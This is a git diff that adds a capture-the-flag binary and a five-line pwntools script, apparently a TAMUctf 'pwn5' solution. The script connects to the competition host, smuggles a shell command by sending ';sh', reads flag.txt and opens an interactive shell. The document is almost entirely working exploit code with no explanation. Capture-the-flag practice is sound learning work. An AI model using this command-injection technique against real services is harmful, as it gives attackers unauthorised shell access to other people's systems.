diff --git a/tamu-writeup/pwn5 b/tamu-writeup/pwn5 new file mode 100644 index 0000000..97aa10c Binary files /dev/null and b/tamu-writeup/pwn5 differ diff --git a/tamu-writeup/pwn5wp.py b/tamu-writeup/pwn5wp.py new file mode 100644 index 0000000..11876a1 --- /dev/null +++ b/tamu-writeup/pwn5wp.py @@ -0,0 +1,5 @@ +from pwn import * +sh = remote("pwn.tamuctf.com", 4325) +sh.sendline(";sh") +sh.sendline("cat flag.txt") +sh.interactive() \ No newline at end of file